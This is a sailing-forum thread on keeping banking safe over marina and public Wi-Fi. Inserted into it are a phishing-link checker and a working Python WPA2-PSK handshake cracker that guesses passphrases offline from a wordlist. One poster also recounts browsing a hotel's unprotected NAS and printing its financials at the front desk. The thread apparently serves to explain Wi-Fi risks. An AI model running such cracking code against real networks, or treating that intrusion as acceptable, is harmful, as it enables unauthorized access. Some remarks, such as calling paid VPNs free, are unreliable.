Secure Wi-Fi?

Sep 18, 2016
25
Beneteau Oceana 31 Orange Beach Al
This question is more for those who live aboard full or part time.

Where are you certain you have secure Wi-Fi? I know everyone likes to check on their checking accounts, IRAs, 401Ks, or trade stocks.

How do you do that securely ?
 
Aug 13, 2012
533
Catalina 270 Ottawa
If you are using a "public" Wi-Fi, use a VPN; this is the only reasonably safe method of ensuring that nobody is snooping. If you are using a professional hot spot, with security, it should be configured in such a way that it won't allow anyone else on the wireless network to see the neighbours. Of course, the question is whether it is. So a VPN is a solution, as well. There are a number of free public VPNs out there (the top three, I think, are ExpressVPN, HideMyAss (sorry, this is a real name) and NordVPN). If you are outside of North America (well, the US and Canada), you may have to look for something else.

If you are doing banking, you are using a secure connection (SSL) (if you don't, change the bank; seriously), so all the traffic is encrypted. Your much bigger worry is all the other traffic - email, web browsing etc. Many email packages don't use encryption, so even if your login (and password) is encrypted, your emails aren't. Someone could, at least theoretically, read your emails along with you. Or, which might be even worse, one might try installing some malware on your computer.

If you spend most of your Internet life on a public or unknown hotspot, you might want to explore a personal firewall solution (e.g. ZoneAlarm, Comodo, Kaspersky). It won't protect you from snooping, but it would protect you from most of the malware.

And keep in mind that security and convenience (ease of use) are the opposite ends of the scale. The more secure your solution is, the more inconvenient it is in daily use. Nothing is free.

Good luck

Marek
 
May 20, 2016
3,015
Catalina 36 MK1 94 Everett, WA
Hot spots are not secure; you are still vulnerable while the devices are setting up the VPN or encrypted connection.
 
Aug 1, 2011
3,972
Catalina 270 255 Wabamun. Welcome to the marina
And further to that, login and password data is not usually passed through a VPN until the tunnel is established, so using that kind of facility is not really vulnerable to a person grabbing random Wireshark captures, and the better VPN products use token authentication, and good luck reading that.
 
Nov 9, 2012
2,500
Oday 192 Lake Nockamixon
An important consideration of wifi is that it is a hub-type of network connection. All traffic goes to all attached machines. When you are at home, you are reasonably secure if your network password uses WPA in order to connect to the wifi network. One would expect that the only devices on your home network are your devices.

But when you are connected to any other wifi network, even if you log in with a WPA password, all your data transmission is visible to all devices on that network. So, for your marina, anyone else on the marina's wifi network can see your network data.

This is why a VPN service is useful. It makes a connection between your device and the service's server, and all the data that goes back and forth is encrypted. So, in our marina wifi network example, other devices would only see unreadable encrypted information on the network.

If you use Android devices, there was a recent report that a significant portion of the VPN apps available for purchase for Android don't actually encrypt data at all. So, you have to be careful that you are using a reputable service.

Some home wifi routers have a VPN feature built in. My Netgear does, using OpenVPN. In this scenario, I could use an OpenVPN client on my computer to make an encrypted connection to my router at home, again masking my data from other devices on an untrusted Wifi network. Given that, there is an OpenVPN client for my Mac, but there is no OpenVPN client for my iPhone or iPad.
 

capta

Jun 4, 2009
4,907
Pearson 530 Admiralty Bay, Bequia SVG
I'm always concerned when there is "free" public access to wifi down here. Nothing is free these days except the wind and the sunlight. I'd suspect that whoever set up and offers "free" wifi has done it to try to collect sensitive information.
 
Sep 23, 2009
1,475
O'Day 34-At Last Rock Hall, Md
For us simple lay people, what is VPN, SSL and WPA?
And how does a person know if it is on?
Thank you.
 
Feb 20, 2011
8,048
Island Packet 35 Tucson, AZ/San Carlos, MX
For us simple lay people, what is VPN, SSL and WPA?
And how does a person know if it is on?
Thank you.
Virtual Private Network
Secure Sockets Layer
Works Progress Administration WiFi Protected Access.

Perhaps someone else could chime in on how one might know it's on.
 
Sep 25, 2008
1,096
CS 30 Toronto
Our club WiFi uses "commercial grade" routers and access points. It's secured with WPA2-PSK, so all users must enter a password. Guest access is enabled but still requires a password and WPA2-PSK only, with reduced bandwidth.
Firewall and NAT are pretty tight, and we don't use the default IP address range for DHCP either. No remote access to any vital gear.

If you use "free" WiFi, you are open. Only use it to look up restaurant and shop etc. Never email or banking.
 

tjar

Aug 8, 2011
166
Hunter Legend 35.5 Tacoma, WA
As others have pointed out, using SSL (evidenced by "https:" in the address) for connections to your bank and other sensitive sites is usually sufficient. A VPN connection from your device to a VPN service provider will also secure your connection over the local WiFi network to the server, but anything beyond the VPN server is not encrypted. A disreputable VPN provider or anybody with access to the other side of their server can then intercept your traffic. Using SSL through the VPN will resolve that problem since SSL is secure end to end.
Email is another problem though. Unless your email connection is also secured using TLS/SSL, emails are the equivalent of sending a postcard that anybody can read along the way. My email client automatically sets up a secure connection whenever I log into my account. That's sufficient for everyday emails, but if I'm sending sensitive info such as Social Security numbers, bank account numbers, or passwords, I encrypt it further using PGP or ProtonMail.
If you're not comfortable with all of this security stuff, using a cellular connection instead of WiFi should set your mind at ease. Although not totally secure either, it's much harder and more expensive to tap into a cellular connection.
 

CarlN

Jan 4, 2009
603
Ketch 55 Bristol, RI
A lot of this advice is out of date for the OP's question. Every bank and financial site uses SSL (you know that because the address will start with "https:" not "http:"). SSL is almost impossible to break. There are rumors that the NSA can do it given enough supercomputers. As mentioned, Wifi security is an issue for lots of other things but not for financial institutions.

But SSL makes no difference if someone learns your password. Virtually all computer crime happens today by stolen passwords. While there are a tiny number of exceptions, almost every password theft happens for one of the following reasons:

1. You use the same password on several sites. It's somehow stolen from one company and then sold on the internet to be tried at every other site with your email address.

2. You use an easy-to-break password. Try this site: https://howsecureismypassword.net

3. They change your password by guessing your security question to reset your password. "What was your first car?" is my favorite. There are only about 50 cars and even fewer names that would be someone's "First car". The hacker just keeps trying until he gets it and can change the password. Obviously, the fix is to not use a real car - go with something like "Lettuce" .

4. You get tricked by a phishing email and click on a link in the email that either installs software on your computer to steal passwords or tricks you into typing your password into a fake site. A lot of the phishing emails are very, very convincing. Instead of clicking on the link, use your normal way to go to the site (e.g. Google or a bookmark).

The greatest recent improvement is that most financial sites will send an SMS code to your phone if someone wants to log in from a new computer or tries to change the password. If offered, use this service. It's very hard to circumvent.
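The post above recommends never clicking a link in a suspicious e-mail and instead navigating to the site yourself. The following is an added example (not code from this thread or from any poster) that automates the check a careful reader does by eye: it pulls every link out of an HTML e-mail and flags the ones where the visible text names one domain but the href goes to another, where the host is a look-alike of a trusted brand, or where a trusted site is linked over plain http rather than https. The e-mail body and the domain "examplebank.com" are constructed for the demo; the two-label "registrable domain" rule is a simplification stated in the code.

```python
"""Flag e-mail links that do not go where they appear to go.

Added example, not from the original thread. SAMPLE_EMAIL and examplebank.com are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Common character swaps seen in look-alike domains (examp1ebank, g00gle, rnicrosoft)
_HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def normalize_label(label: str) -> str:
    """Heuristic fold of look-alike characters so examp1ebank compares equal to examplebank."""
    return label.lower().translate(_HOMOGLYPHS).replace("rn", "m")


def registrable_domain(host: str) -> str:
    """Simplification for the demo: the last two labels (examplebank.com).
    Production code should use the Public Suffix List to handle names such as example.co.uk."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> tag in the message."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def suspicious_links(html: str, trusted_domains) -> list:
    """Return (href, reason) for each link that should not be clicked.

    Checks, in priority order:
      1. the visible text shows one domain but the href goes to another;
      2. the host is a look-alike of a trusted brand (brand name as an extra label, or swapped characters);
      3. the link is plain http to a trusted site, so it can be read or redirected on the local network.
    """
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        parsed = urlparse(href)
        target_host = (parsed.hostname or "").lower()
        # If the link text itself looks like a URL or a domain, that is where the reader believes it goes
        shown_host = (urlparse(text if "://" in text else "//" + text).hostname or "").lower()
        reason = None
        if "." in shown_host and registrable_domain(shown_host) != registrable_domain(target_host):
            reason = f"text shows {shown_host} but the link goes to {target_host}"
        else:
            labels = [normalize_label(label) for label in target_host.split(".")]
            for brand in trusted_domains:
                if normalize_label(brand.split(".")[0]) in labels and registrable_domain(target_host) != brand:
                    reason = f"look-alike of {brand}: {target_host}"
                    break
            if reason is None and parsed.scheme.lower() == "http" and registrable_domain(target_host) in trusted_domains:
                reason = f"unencrypted http link to {target_host}"
        if reason:
            findings.append((href, reason))
    return findings


# Constructed phishing-style message: one mismatch, one plain-http link, one genuine link, one look-alike
SAMPLE_EMAIL = """
<p>Dear customer, your account has been locked. Please verify your details.</p>
<a href="https://examplebank.com.account-verify.net/login">https://examplebank.com/login</a>
<a href="http://examplebank.com/security">Security centre</a>
<a href="https://www.examplebank.com/contact">Contact us</a>
<a href="https://examp1ebank.com/login">Log in now</a>
"""


def scan_sample() -> list:
    """Run the check over the constructed message, trusting only examplebank.com."""
    return suspicious_links(SAMPLE_EMAIL, {"examplebank.com"})


if __name__ == "__main__":
    for href, reason in scan_sample():
        print(f"DO NOT CLICK {href}: {reason}")
```

Of the four links in the constructed message, only the https link to www.examplebank.com passes; the other three are reported with the reason a reader would want to see before deciding to type the bank's address in by hand instead.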
 
Aug 1, 2011
3,972
Catalina 270 255 Wabamun. Welcome to the marina
For us simple lay people, what is VPN, SSL and WPA?
And how does a person know if it is on?
The simple answer is, if you are on a public network, which includes ANY "free" wifi, assume you are NOT safe. This clearly means, do not use the network at the coffee shop to check your bank statement under any circumstances. You will eventually find out that it wasn't safe, but only after you next check your bank balance, or what's left of it.
 
Aug 1, 2011
3,972
Catalina 270 255 Wabamun. Welcome to the marina
We stayed at a hotel in Vancouver BC a few years ago, and while connected to the free hotel wifi, I found a NAS server (a hard drive) on the network. This particular box didn't have any passwords and happened to contain the backup for the hotel's PMS (Property Management System). It took all of 10 minutes to craft a screenshot of yesterday's financials and send it to the front desk printer. Needless to say, they were speechless.
If this stuff can be found by casual viewing, consider what somebody intent on stealing your info can do.
 
May 20, 2016
3,015
Catalina 36 MK1 94 Everett, WA
Several years ago I took CISSP and Ethical Hacking courses, and there is a very good reason security folks don't like wireless. All the VPN, WPA, WPA2 and SSH won't matter if the hackers can intercept or spoof the first interactions between you and the wireless network.
 
Nov 9, 2012
2,500
Oday 192 Lake Nockamixon
Our club WiFi uses "commercial grade" routers and access points. It's secured with WPA2-PSK, so all users must enter a password. Guest access is enabled but still requires a password and WPA2-PSK only, with reduced bandwidth.
Firewall and NAT are pretty tight, and we don't use the default IP address range for DHCP either. No remote access to any vital gear.
None of this means any data traveling on the wifi network from your computer out to the internet is secure. Wifi Protected Access v. 2 with Pre-Shared Key (WPA2-PSK) is only a way to ensure people that should be able to get onto the network can get onto the network. The pre-shared key is basically a (hopefully) reasonably complex password to allow your device on the network. Once your device is on that wifi network, all other devices on that network can see your data. Obviously, one hopes that no one else who is a member of your club, and who has the pre-shared key (password) to the club's network, would actually sit there and sniff the network traffic... so... you could be reasonably safe. However, someone who is data paranoid would not find that to be adequate security for their data.

With regards to JustSomeGuy's question, a VPN is a Virtual Private Network. It is a Virtual network, because it is not a direct network connection, it's a network connection that runs over the internet. It is Private because all data between your device and the target network endpoint is encrypted, so no one else can see the data, they can just see that network packets are going back and forth. And, it's a Network, because it carries your data back and forth to the endpoint.

Your wired cable or FiOS connection from your house to Comcast or Verizon or Time Warner is a direct network connection. Or, with some companies, the connection from regional office to home office might be a direct network connection that the company pays for from a service provider. Used to be a T1 was a direct connection between two locations, but that's slow tech nowadays. On the other end, you could be connecting to a router, or a server, or whatever that creates a secure connection to your device, so it can kinda "tunnel" through the interwebs to move your data back and forth. You could have a field office that has a network device that creates this encrypted network "tunnel" to another network device at the home office. Or, you could have VPN software such as Cisco AnyConnect on your laptop, which creates this encrypted connection to the VPN device at your company. Or you could roll your own MacOS X server (or Windows server, or Linux server) at home, which allows your computer to make a secure VPN connection when you're out in the public world at large.
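Two posts in this thread make related points: that a WPA2 pre-shared key only controls who may join the network, and that what a hacker catches during "the first interactions between you and the wireless network" undermines everything after it. The following is an added example (not code from this thread or from any poster) showing why both are true of WPA2-PSK: every station's per-session key (the PTK) is derived from the network passphrase plus two MAC addresses and two nonces that are sent in the clear in the 4-way handshake. Anyone who already knows the marina's passphrase and records that handshake can reproduce your session key, and anyone who does not know it can test passphrase guesses offline against the handshake's MIC, which is exactly why a short pre-shared key is recoverable. The SSID, passphrase, MAC addresses, nonces and EAPOL frame below are constructed for the demo; the key-derivation formulas are the ones in IEEE 802.11, and the PBKDF2 step is checked against the standard's published "password"/"IEEE" test vector.

```python
"""WPA2-PSK key derivation and the offline handshake check it permits.

Added example, not from the original thread. All handshake values below are constructed.
Formulas: IEEE 802.11 (PMK via PBKDF2-HMAC-SHA1, PTK via PRF-384, EAPOL MIC via HMAC-SHA1-128).
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Every station that knows the passphrase shares this same PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) until nbytes are produced."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    AA/SPA are the AP and station MAC addresses, the nonces come from handshake messages 1 and 2: all sent in clear.
    Layout: KCK = PTK[0:16] (MIC key), KEK = PTK[16:32], TK = PTK[32:48] (the key that encrypts your data frames)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL-Key frame with the
    16-byte MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(wordlist, ssid, aa, spa, anonce, snonce, eapol_zeroed, observed_mic):
    """Offline check of passphrase guesses against one captured handshake: derive PMK -> PTK -> KCK for
    each guess and compare the resulting MIC with the one the station actually sent. No further
    contact with the network is needed, which is why the strength of the PSK is all that protects it."""
    for guess in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_zeroed), observed_mic):
            return guess
    return None


# Constructed handshake for the demo (not a real capture)
SSID = "MarinaGuest"
PASSPHRASE = "anchorsaweigh"
AA = bytes.fromhex("001122334455")        # access point MAC
SPA = bytes.fromhex("66778899aabb")       # station (your laptop) MAC
ANONCE = bytes(range(32))                 # from handshake message 1, sent in clear
SNONCE = bytes(range(32, 64))             # from handshake message 2, sent in clear
# EAPOL-Key message 2 of 4: version 1, type 3 (Key), length 0x5f, descriptor 2, key info 0x010a
# (MIC bit, Pairwise bit, descriptor version 2), key length 0, replay counter 1, SNonce,
# zero IV/RSC/ID, 16-byte MIC field zeroed for the calculation, key data length 0.
EAPOL_ZEROED = (
    bytes.fromhex("0103005f02010a00000000000000000001")
    + SNONCE
    + bytes(16) + bytes(8) + bytes(8)     # Key IV, Key RSC, Key ID
    + bytes(16)                           # MIC field (zeroed)
    + bytes(2)                            # Key Data Length
)


def station_mic() -> bytes:
    """What the legitimate station puts in message 2: MIC under the KCK derived from the real passphrase."""
    ptk = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_ZEROED)


def demo() -> str:
    """A neighbour with the captured handshake and a small wordlist recovers the passphrase offline."""
    wordlist = ["password", "marina2016", "letmein", "anchorsaweigh", "sailboat"]
    return crack_handshake(wordlist, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_ZEROED, station_mic())


if __name__ == "__main__":
    print("recovered passphrase:", demo())
    print("TK (frame encryption key) for this session:",
          ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[32:].hex())
```

The point for the marina Wi-Fi case is the last line: once the passphrase is known, whether because it is printed on the clubhouse wall or because it fell to a wordlist, the TK for your session follows directly from values anyone nearby can record, so the WPA2 padlock on the network says nothing about who can read your traffic. That is the gap a VPN or end-to-end TLS is there to close.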